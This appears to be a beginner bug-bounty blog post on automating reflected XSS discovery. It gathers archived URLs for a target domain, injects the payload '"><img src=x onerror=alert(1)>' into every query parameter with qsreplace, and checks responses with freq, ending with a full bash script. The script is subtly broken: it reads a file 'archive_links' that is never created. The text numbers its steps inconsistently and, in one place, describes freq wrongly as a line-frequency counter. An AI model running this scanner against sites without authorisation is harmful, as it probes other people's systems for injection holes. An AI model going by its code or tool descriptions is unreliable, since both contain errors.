Automating XSS
Hey folks,
How have you been?
Automation became very popular nowadays so what about automating XSS detection?
So let get started
Who am I ?
Hi, i am Ujwal AKA Krip who just started bug bounty. in today’s article you will know about automating xss detection using few open sources tools.
Basically there are 4 minor parts for automating xss
- Gathering urls
- removing similar and duplicates urls
- finding parameters in urls and checking if they are vulnerable to xss or not
Step:1 Gathering urls
For this we are using a famous tool like waybackurl and gau for gathering all urls
Let suppose domain as Target.com
waybackurls example.com > archive_url
gau example.com >> archive_url
sort -u archive_links -o archive_urlThis command will find old and archived urls using waybackurl and gau. after that we are removing similar urls using sort command and storing in archive_url file
Step:2 removing similar and duplicates urls
for removing similar urls we are using the tool named as uro
Installation process of uro is given in github. i am leaving the link you can download from there.
Let’s use uro
cat archive_url | uro | tee -a archive_url_uroAfter this we will get worthwhile url for xss
Step:4 finding parameters in urls and checking if they are vulnerable to xss or not
To achieve this we will use tools like qsreplace and freq
Qsreplace: By using qsreplace we are replacing the parameter value to the specified payload. In our case that is “><img src=x onerror=alert(1)> you can replace with your own payload
freq: The output of qsreplace is passed on to freq. What freq does on a brief is like it curl’s the endpoint and checks for our payload reflection in the response.
Here is the final command
cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable" | tee -a freq_xss_findingsThe given command performs a series of operations on a file named “archive_url_uro.” Here is a breakdown of what each part of the command does:
cat archive_url_uro: This command reads the contents of the file "archive_url_uro" and displays them on the screen.grep "=": This command filters the output of the previous command and selects only the lines that contain the equal sign (=).qsreplace '"><img src=x onerror=alert(1)>': This command replaces the values on each line selected by the previous command with the string"><img src=x onerror=alert(1)>. Theqsreplaceutility is commonly used to replace query string parameters in URLs.freq: This command counts the frequency of each line in the output.grep -iv "Not Vulnerable": This command filters the output and excludes any lines that contain the case-insensitive phrase "Not Vulnerable."tee -a freq_xss_findings: This command appends the filtered output to a file named "freq_xss_findings" while also displaying it on the screen.
Automating XSS
here is the juicy part you all are waiting for
#!/bin/bash
echo "[+] Running waybackurls"
waybackurls $1 > archive_url
echo "[+] Running gau"
gau $1 >> archive_url
sort -u archive_links -o archive_url
cat archive_links | uro | tee -a archive_url_uro
echo "[+] Starting qsreplace and freq"
cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | tee -a freq_output | grep -iv "Not Vulnerable" | tee -a freq_xss_findings
echo "[+] Script Execution Ended"This script collects the “waybackurls” (archived URLs) for specific domains. It then filters out duplicate, similar, or irrelevant URLs. After that, it utilizes the “qsreplace” and “freq” tools to identify and count valid instances of Cross-Site Scripting (XSS) vulnerabilities. The findings are stored in a file called “freq_xss_findings.
Pass the domain as an argument for the script like “./script.sh Target.com”.
That’s all for today, Thank you for reading.
Happy Hunting!!!
